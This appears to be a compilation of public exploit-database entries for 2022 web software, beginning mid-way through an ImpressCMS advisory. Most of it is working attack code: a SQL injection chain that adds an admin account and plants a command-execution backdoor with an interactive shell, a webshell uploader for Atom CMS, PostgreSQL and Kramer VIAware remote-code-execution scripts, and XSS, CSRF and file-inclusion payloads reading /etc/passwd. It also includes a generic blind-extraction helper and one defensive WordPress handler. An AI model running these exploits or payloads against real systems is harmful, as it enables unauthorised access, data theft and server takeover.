    methods. These methods use the first argument to construct a SQL query without proper
    validation, and this can be exploited by remote attackers to e.g. read sensitive data
    from the "users" database table through boolean-based SQL Injection attacks. The
    application uses PDO as a database driver, which allows for stacked SQL queries, as such
    this vulnerability could be exploited to e.g. create a new admin user and execute
    arbitrary PHP code.

    [-] CVE Reference:

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2021-26599 to this vulnerability.

    [-] Disclosure timeline:

    [19/01/2021] - Vendor notified through HackerOne
    [29/01/2021] - Vulnerability acknowledged by the vendor
    [03/02/2021] - CVE number assigned
    [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed
    [11/02/2022] - Vendor was informed about the ineffective fix
    [09/03/2022] - Version 1.4.4 released
    [22/03/2022] - Public disclosure

    [-] Technical writeup:

    http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce
*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

// MySQL hex literal (0x...): lets the stacked SET @q / PREPARE payloads carry quotes without quoting
function hex_enc($input)
{
    $encoded = "";
    for ($i = 0; $i < strlen($input); $i++) $encoded .= sprintf("%02x", ord($input[$i]));
    return "0x{$encoded}";
}

print "+-----------------------------------------------------------+\n";
print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n";
print "+-----------------------------------------------------------+\n";

if ($argc != 2)
{
    print "\nUsage: php $argv[0] <URL>";
    print "\nExample.: php $argv[0] http://localhost/impresscms/";
    print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n";
    die();
}

$url = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

print "\n[+] Retrieving security token (CVE-2021-26598)\n";
curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend");
$res = curl_exec($ch);
if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session cookie not found!\n");
if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n");

print "[+] Starting SQL Injection attack (CVE-2021-26599)\n";
print "[*] Step 1: retrieving database name\n";
curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]);
$params = "user_submit=1&token={$token[1]}&groups[]=%s";

// Boolean-based blind: 8 requests per character (one per bit), the oracle being
// whether findusers.php answers "No Users Found" for ORD(SUBSTR(DATABASE(),i,1)) < $test
$dbname = "";
$min = true; $idx = 1;
while(1)
{
    $test = 256;
    for ($i = 7; $i >= 0; $i--)
    {
        $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
        $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#";
        curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
        $min = !preg_match("/No Users Found/", curl_exec($ch));
    }
    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;
    $dbname .= chr($chr);
    $min = true; $idx++;
    print "\r[+] DB name: {$dbname}";
}

print "\n[*] Step 2: retrieving tables prefix\n";
// Time-based blind via a stacked prepared statement: IF(cond, 1, SLEEP(1))
$sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'";
$prefix = "";
$min = true; $idx = 1;
while(1)
{
    $test = 256;
    for ($i = 7; $i >= 0; $i--)
    {
        $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
        $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))");
        $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#";
        curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
        $start = time();
        curl_exec($ch);
        $secs = time() - $start;
        $min = ($secs < 2);
    }
    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;
    $prefix .= chr($chr);
    $min = true; $idx++;
    print "\r[+] Prefix: {$prefix}";
}

print "\n[*] Step 3: creating new admin user\n";
$uid = time();
$enc = hex_enc("egix");
$pwd = hex_enc(md5("egix"));
$sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#";
curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
curl_exec($ch);
$sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#";
curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
curl_exec($ch);

print "[+] Trying to login as the new user\n";
curl_setopt($ch, CURLOPT_URL, "{$url}user.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login");
if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n");

print "[+] Creating malicious autotask\n";
$phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }");
curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks");
if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n");

print "[+] Launching shell\n";
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, false);
while(1)
{
    print "\nimpresscms-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
    preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
-
Atom CMS 2.0 - Remote Code Execution (RCE)
# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)
# Date: 22.03.2022
# Exploit Author: Ashish Koli (Shikari)
# Vendor Homepage: https://thedigitalcraft.com/
# Software Link: https://github.com/thedigicraft/Atom.CMS
# Version: 2.0
# Tested on: Ubuntu 20.04.3 LTS
# CVE: CVE-2022-25487
# Description: This script uploads webshell.php to Atom CMS. The application stores the file in the uploads directory under a unique number, which lets us reach the webshell.
# Usage : python3 exploit.py <IP> <Port> <atomcmspath>
# Example: python3 exploit.py 127.0.0.1 80 /atom
# POC Exploit: https://youtu.be/qQrq-eEpswc
# Note: A crafted "shell.txt" file (the raw multipart body matching the boundary in the Content-Type header below) is required for exploitation and is available at:
# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC

#!/usr/bin/python3
'''
Description:
A file upload functionality in Atom CMS 2.0 allows any non-privileged user to gain access to the host through the uploaded files, which may result in remote code execution.
'''
import re
import sys
import requests

''' User Input: '''
target_ip = sys.argv[1]
target_port = sys.argv[2]
atomcmspath = sys.argv[3]
base = 'http://' + target_ip + ':' + target_port + atomcmspath

''' Get cookie '''
session = requests.Session()
session.get(base + '/admin')
# Flatten the session cookies into a Cookie header value ("name=value; name2=value2")
cookie = '; '.join(f'{k}={v}' for k, v in session.cookies.get_dict().items())

''' Upload Webshell: '''
# Construct Header:
header1 = {
    'Host': target_ip,
    'Accept': 'application/json',
    'Cache-Control': 'no-cache',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',
    'Origin': 'http://' + target_ip,
    'Referer': base + '/admin/index.php?page=users&id=1',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cookie': cookie,
    'Connection': 'close',
}

# Load the pre-built multipart body carrying the webshell:
with open('shell.txt', 'rb') as fp:
    data = fp.read()

# Upload the webshell; the unauthenticated uploads.php returns the numeric id it stored the file under
link_upload = base + '/admin/uploads.php?id=1'
upload = requests.post(link_upload, headers=header1, data=data)
p = upload.text
x = re.sub(r"\s", "\n", p)
y = x.replace("1<br>Unknown", "null")
z = re.sub('[^0-9]', '', y)

''' Finish: '''
print('Uploaded Webshell to: ' + base + '/uploads/' + z + '.php')
print('')
-
Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
# Date: 2022-03-22
# Author: Milad karimi
# Software Link: https://www.drupal.org/project/avatar_uploader
# Version: v7.x-1.0-beta8
# Tested on: Windows 10
# CVE: N/A

1. Description:
The `file` parameter handled by avatar_uploader.pages.inc is reflected in the response without output encoding, which gives reflected cross-site scripting, as the proof of concept below shows.

2. Proof of Concept:
http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script>
-
WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
# Version: 1.0.2
# Tested on: Firefox

## Summary:
A cross-site request forgery vulnerability in the Curtain WordPress plugin allows an attacker to activate or deactivate the site's maintenance mode. The `_wpnonce` value can be left empty, i.e. the plugin does not verify the nonce on this request.

## Vulnerable URL:
http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0

## CSRF POC Exploit
```
<html>
  <body>
    <form action="http://localhost:10003/wp-admin/options-general.php">
      <input type="hidden" name="page" value="curtain" />
      <input type="hidden" name="_wpnonce" value="" />
      <input type="hidden" name="mode" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
-
WordPress Plugin admin-word-count-column 2.2 - Local File Read
# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
# Date: 27-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/
# Version: 2.2
# Contact me: h [at] spidersilk.com
# PHP version: 5.3.2 or below
# Vulnerable File: plugins/admin-word-count-column/download-csv.php

# Vulnerable Code: the `path` parameter is used as a directory prefix for readfile() with no validation; the fixed 'cpwc.csv' suffix is what the null byte is there to cut off.

```php
<?php
date_default_timezone_set('America/Los_Angeles');
$csvdate = date('Md-H-i-s-T');
$csvname = 'wordcounts-' . $csvdate . '.csv';
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename=' . $csvname);
header('Pragma: no-cache');
readfile($_GET['path'] . 'cpwc.csv');
?>
```

# Proof of Concept:
localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0

Note: the null byte truncation only works on old PHP (the author gives 5.3.2 and below; from PHP 5.3.4 a path containing NUL is rejected). On newer PHP the request still reads `../../etc/passwd` + `cpwc.csv`, which does not exist, so the suffix becomes the effective mitigation.
-
WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php
# Impact: Local File Read / Code Execution

# Vulnerable Code: the `controller` parameter is concatenated into a require_once() path; only the '.php' suffix is fixed, so any .php file reachable by traversal is executed.

```php
if(!empty($_GET['controller']) && !empty($_GET['action']) && !empty($_GET['ajax']) && $_GET['ajax'] == 1) {
    require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```

# Proof of concept:
http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution:
/etc/index.php:
```php
<?php
echo "Local file read";
phpinfo();
?>
```
-
WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 26-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/
# Version: 1.7.4
# Tested on: Firefox
# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php

# Vulnerable Code: the `p` parameter is concatenated into an include() path with a fixed '.php' suffix, so traversal to any .php file executes it.

```php
<?php
if ($_GET['p']<=NULL) {
    include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');
}else{
    include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');
}
```

# Proof of Concept:
http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index

Contents of /etc/index.php:
```php
<?php
echo "Local file read";
phpinfo();
?>
```
-
CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi (Authenticated)
# Date: 2021-04-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
# Version: 1.2.9
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
# CVE: CVE-2021-43701

*Steps to Reproduce:*
1. First log in to your Admin Panel.
2. Then go to "General Menu > CSV Export / Import".
3. Open Burp Suite and configure it with the browser.
4. Select any "Table Name", then select "Fields Select" and "Sort by".
5. Click "Export to CSV" and intercept the request with Burp Suite.
6. The "fieldS[]" and "orderby" parameters are vulnerable. Try a time-based blind injection by putting "(select(0)from(select(sleep(10)))a)" in the "orderby" parameter.

*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV

*Output:*
By issuing sleep(0) the response is delayed by 0 seconds.
By issuing sleep(1) the response is delayed by 1 second.
By issuing sleep(5) the response is delayed by 5 seconds.
By issuing sleep(10) the response is delayed by 10 seconds.
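Both the ImpressCMS exploit above and this CSZ CMS entry reduce to the same primitive: a yes/no oracle (a "No Users Found" string in one case, a measurable delay in the other) that answers `ORD(SUBSTR(secret, i, 1)) < n`, from which each byte is recovered with eight queries by binary search. The script below is an added example (not taken from either advisory) that implements that extraction generically, builds the payload shapes seen on this page, and exercises them against a constructed fake target so it runs offline. The `FakeTarget` and its secret are constructed; the conditional form of the CSZ `orderby` payload is an assumption, since the advisory only shows a bare `sleep()`.

```python
def extract_string(oracle_less_than, max_len: int = 64) -> str:
    """Blind extraction. oracle_less_than(idx, value) must answer the SQL question
    ORD(SUBSTR(secret, idx, 1)) < value. Each byte costs exactly 8 oracle calls
    (binary search over 0..255); ORD('') is 0 past the end, which terminates the loop."""
    out = ""
    for idx in range(1, max_len + 1):
        lo, hi = 0, 256                      # invariant: lo <= ORD(ch) < hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle_less_than(idx, mid):
                hi = mid
            else:
                lo = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def hex_enc(s: str) -> str:
    """MySQL hex literal, as in the ImpressCMS exploit: no quotes needed inside SET @q = ..."""
    return "0x" + s.encode().hex()


def impresscms_boolean_payload(idx: int, value: int) -> str:
    # groups[] value closing the IN (...) list; page prints "No Users Found" when false
    return f"1) AND ORD(SUBSTR(DATABASE(),{idx},1))<{value}#"


def impresscms_stacked_payload(select_sql: str) -> str:
    # PDO allows stacked queries; PREPARE from a hex literal sidesteps quoting entirely
    return f"0); SET @q = {hex_enc(select_sql)}; PREPARE stmt FROM @q; EXECUTE stmt;#"


def csz_orderby_payload(cond: str, delay: int = 5) -> str:
    # Assumption: wrapping the advisory's bare sleep() in IF() to make it conditional
    return f"(select(0)from(select(if(({cond}),sleep({delay}),0)))a)"


class FakeTarget:
    """Constructed stand-in for a vulnerable application; answers both oracle styles."""

    def __init__(self, secret: str):
        self.secret = secret
        self.queries = 0

    def _cond(self, idx: int, value: int) -> bool:
        self.queries += 1
        ch = self.secret[idx - 1:idx]        # SUBSTR(secret, idx, 1); '' past the end
        code = ord(ch) if ch else 0          # ORD('') = 0
        return code < value

    def boolean_oracle(self, idx: int, value: int) -> bool:
        body = "<p>Results</p>" if self._cond(idx, value) else "<p>No Users Found</p>"
        return "No Users Found" not in body

    def time_oracle(self, idx: int, value: int, delay: float = 1.0) -> bool:
        elapsed = 0.0 if self._cond(idx, value) else delay   # simulated, no real sleep
        return elapsed < delay / 2


if __name__ == "__main__":
    t = FakeTarget("impresscms_db")
    print(extract_string(t.boolean_oracle), "in", t.queries, "queries")
    print(impresscms_stacked_payload("SELECT IF(ORD(SUBSTR(DATABASE(),1,1))<128,1,SLEEP(1))"))
    print(csz_orderby_payload("ascii(substr(database(),1,1))<128"))
```

Against a live target the oracle functions send the request and either search the body or time it; everything else stays as is. The time-based oracle should compare against a measured baseline rather than a fixed threshold, and a delay of a few seconds with one retry on disagreement keeps network jitter from corrupting bytes.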
-
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-03-29
# Exploit Author: b4keSn4ke
# Github: https://github.com/b4keSn4ke
# Vendor Homepage: https://www.postgresql.org/
# Software Link: https://www.postgresql.org/download/linux/debian/
# Version: 9.3 - 11.7
# Tested on: Linux x86-64 - Debian 4.19
# CVE: CVE-2019-9193
# Note: COPY ... FROM PROGRAM needs a superuser (or, from PostgreSQL 11, a member of pg_execute_server_program); the PostgreSQL project disputes the CVE and documents this as intended behaviour, so the finding is really "superuser database credentials are exposed".

#!/usr/bin/python3

import psycopg2
import argparse
import hashlib
import re
import time


def parseArgs():
    parser = argparse.ArgumentParser(description='CVE-2019-9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution')
    parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
    parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')
    parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]')
    parser.add_argument('-c', '--command', nargs='?', help='System command to run')
    parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]')
    parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]')
    parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the PostgreSQL DB [Default: postgres]')
    args = parser.parse_args()
    return args


def main():
    try:
        print("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port))
        connection = psycopg2.connect(
            database=args.database,
            user=args.user,
            password=args.password,
            host=args.ip,
            port=args.port,
            connect_timeout=args.timeout
        )
        print("[+] Connection to Database established")
        print("[+] Checking PostgreSQL version")
        checkVersion(connection)
        if (args.command):
            exploit(connection)
        else:
            print("[+] Add the argument -c [COMMAND] to execute a system command")
    except psycopg2.OperationalError as e:
        print("\r\n[-] Connection to Database failed: \r\n{0}".format(e))
        exit()


def checkVersion(connection):
    cursor = connection.cursor()
    cursor.execute("SELECT version()")
    record = cursor.fetchall()
    cursor.close()
    result = deserialize(record)
    # Parse "PostgreSQL 11.7 on ..." as (major, minor). The original sliced four characters
    # into float(), which raised on three-part versions such as "9.6.24" or "9.3.1".
    m = re.search(r"PostgreSQL (\d+)\.(\d+)", result)
    if not m:
        print("[-] Could not parse PostgreSQL version from: {0}".format(result.strip()))
        exit()
    version = (int(m.group(1)), int(m.group(2)))
    if (9, 3) <= version <= (11, 7):
        print("[+] PostgreSQL {0}.{1} is likely vulnerable".format(*version))
    else:
        print("[-] PostgreSQL {0}.{1} is not vulnerable".format(*version))
        exit()


def deserialize(record):
    result = ""
    for rec in record:
        result += rec[0] + "\r\n"
    return result


def randomizeTableName():
    return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest())


def exploit(connection):
    cursor = connection.cursor()
    tableName = randomizeTableName()
    try:
        print("[+] Creating table {0}".format(tableName))
        # COPY ... FROM PROGRAM runs the command as the postgres OS user and stores its stdout
        cursor.execute("DROP TABLE IF EXISTS {1};\
                        CREATE TABLE {1}(cmd_output text);\
                        COPY {1} FROM PROGRAM '{0}';\
                        SELECT * FROM {1};".format(args.command, tableName))
        print("[+] Command executed\r\n")
        record = cursor.fetchall()
        result = deserialize(record)
        print(result)
        print("[+] Deleting table {0}\r\n".format(tableName))
        cursor.execute("DROP TABLE {0};".format(tableName))
        cursor.close()
    except psycopg2.errors.ExternalRoutineException as e:
        print("[-] Command failed : {0}".format(e.pgerror))
        print("[+] Deleting table {0}\r\n".format(tableName))
        cursor = connection.cursor()
        cursor.execute("DROP TABLE {0};".format(tableName))
        cursor.close()
    finally:
        exit()


if __name__ == "__main__":
    args = parseArgs()
    main()
-
Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)
# Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)
# Date: 28/03/2022
# Exploit Author: sharkmoos & BallO
# Vendor Homepage: https://www.kramerav.com/
# Software Link: https://www.kramerav.com/us/product/viaware
# Version: 2.5.0719.1034
# Tested on: ViaWare Go (Windows 10)
# CVE : CVE-2019-17124

import requests, sys, urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def adminLogin(s, host, username, password):
    headers = {
        "Host": f"{host}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-GB,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": f"https://{host}",
        "Referer": f"https://{host}/admin/login.php",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close"
    }
    data = {
        "txtUserId": username,
        "txtPwd": password,
        "btnOk": "Login"
    }
    # The original called s.post() without headers or data, so the credentials were never sent
    s.post(f"https://{host}/admin/login.php", headers=headers, data=data, verify=False)
    # Weak success check kept from the original: any cookie set on the session counts as logged in
    return len(s.cookies) >= 1


def writeCommand(session, host, command):
    headers = {
        "Host": f"{host}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Accept": "text/html, */*",
        "Accept-Language": "en-GB,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": f"https://{host}",
        "Referer": f"https://{host}/browseSystemFiles.php?path=C:\\Windows&icon=browser",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close"
    }
    # The file-browser AJAX handler writes arbitrary content to an arbitrary path;
    # dropping it into the web server's cgi-bin as a .cmd makes it executable over HTTP
    data = {
        "radioBtnVal": f"{command}",
        "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd"
    }
    session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False)


def getResult(session, host):
    file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False)
    pageText = file.text
    if len(pageText) < 1:
        result = "Command did not return a result"
    else:
        result = pageText
    return result


def main(host, username="su", password="supass"):
    s = requests.Session()
    # comment this line to skip the login stage
    loggedIn = adminLogin(s, host, username, password)
    if not loggedIn:
        print("Could not successfully login as the admin")
        sys.exit(1)
    command = ""
    while command != "exit":
        command = input("cmd:> ").strip()
        writeCommand(s, host, command)
        print(getResult(s, host))
    exit()


if __name__ == "__main__":
    args = sys.argv
    numArgs = len(args)
    if numArgs < 2:
        print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")
        print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")
    if numArgs == 2:
        main(args[1])
    if numArgs == 4:
        main(args[1], args[2], args[3])
    if numArgs > 4:
        print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")
        print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")
-
WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
# Date: 2/27/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/easy-cookies-policy/
# Version: 1.6.2
# Tested on: Windows 10
# CVE: CVE-2021-24405

1. Description:
Broken access control: the plugin's settings-save action on admin-ajax.php does not restrict who may call it, so any authenticated user can change the cookie banner (including its text, which is where the stored XSS lands) with a single POST request. If user registration is closed, the same request can be delivered through CSRF.

2. Proof of Concept:
POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 226
Origin: http://localhost
Connection: keep-alive
Host: localhost
Cookie: [Any authenticated user]

action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd
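A defensive counterpart to the request above, as an added example that is not the plugin's own code: the weak wp_ajax handler pattern beside a hardened one that adds a nonce check (CSRF), a capability check (low-privilege users) and per-field sanitisation, plus escaping on output. The action name comes from the PoC; the option name, nonce action, function names and the allowed value sets are assumptions.

```php
<?php
// Added example (not the plugin's code): hardened handler for the wp_ajax
// action seen in the PoC. Option name, nonce action, function names and the
// allowed value sets below are assumptions.

// Weak pattern: every logged-in user can reach wp_ajax_* actions, so a handler
// that stores request data with no capability or nonce check lets a subscriber
// (or an admin's browser driven by a CSRF page) store arbitrary markup.
function ecp_save_settings_unsafe() {
    update_option( 'easy_cookies_policy_settings', wp_unslash( $_POST ) ); // assumed option name
    wp_die();
}

// Hardened version: nonce first, then capability, then sanitise each field.
function ecp_save_settings_safe() {
    // Dies with HTTP 403 unless the 'nonce' field matches a token issued by
    // wp_create_nonce( 'ecp_save_settings' ) on the settings page.
    check_ajax_referer( 'ecp_save_settings', 'nonce' );

    // Changing site-wide banner settings is an administrator action.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    $in = wp_unslash( $_POST );

    $allowed_close    = array( 'accept', 'x' );       // assumed
    $allowed_display  = array( 'fixed', 'static' );   // assumed
    $allowed_position = array( 'top', 'bottom' );     // assumed

    $settings = array(
        // wp_kses_post() keeps basic formatting but strips <script> and on* handlers.
        'maintext'     => wp_kses_post( $in['maintext'] ?? '' ),
        'background'   => sanitize_text_field( $in['background'] ?? 'black' ),
        'transparency' => min( 100, max( 0, absint( $in['transparency'] ?? 90 ) ) ),
        'close'        => in_array( $in['close'] ?? '', $allowed_close, true ) ? $in['close'] : 'accept',
        'expires'      => absint( $in['expires'] ?? 365 ),
        'enabled'      => ( 'true' === ( $in['enabled'] ?? '' ) ),
        'display'      => in_array( $in['display'] ?? '', $allowed_display, true ) ? $in['display'] : 'fixed',
        'position'     => in_array( $in['position'] ?? '', $allowed_position, true ) ? $in['position'] : 'top',
        'button_text'  => sanitize_text_field( $in['button_text'] ?? 'Accept' ),
        // Accept only a 6-digit hex colour; anything else falls back to the default.
        'text_color'   => preg_match( '/^#[0-9a-fA-F]{6}$/', $in['text_color'] ?? '' ) ? $in['text_color'] : '#dddddd',
    );

    update_option( 'easy_cookies_policy_settings', $settings );
    wp_send_json_success( $settings );
}
add_action( 'wp_ajax_easy_cookies_policy_save_settings', 'ecp_save_settings_safe' );

// Escape on output too, so a value that reached the option by another path is
// rendered as text or an attribute value, never as markup.
function ecp_render_banner() {
    $s = get_option( 'easy_cookies_policy_settings', array() );
    printf(
        '<div class="ecp-banner ecp-%1$s" style="background:%2$s;color:%3$s;opacity:%4$s">%5$s <button>%6$s</button></div>',
        esc_attr( $s['position'] ?? 'top' ),
        esc_attr( $s['background'] ?? 'black' ),
        esc_attr( $s['text_color'] ?? '#dddddd' ),
        esc_attr( ( $s['transparency'] ?? 90 ) / 100 ),
        wp_kses_post( $s['maintext'] ?? '' ),
        esc_html( $s['button_text'] ?? 'Accept' )
    );
}
```

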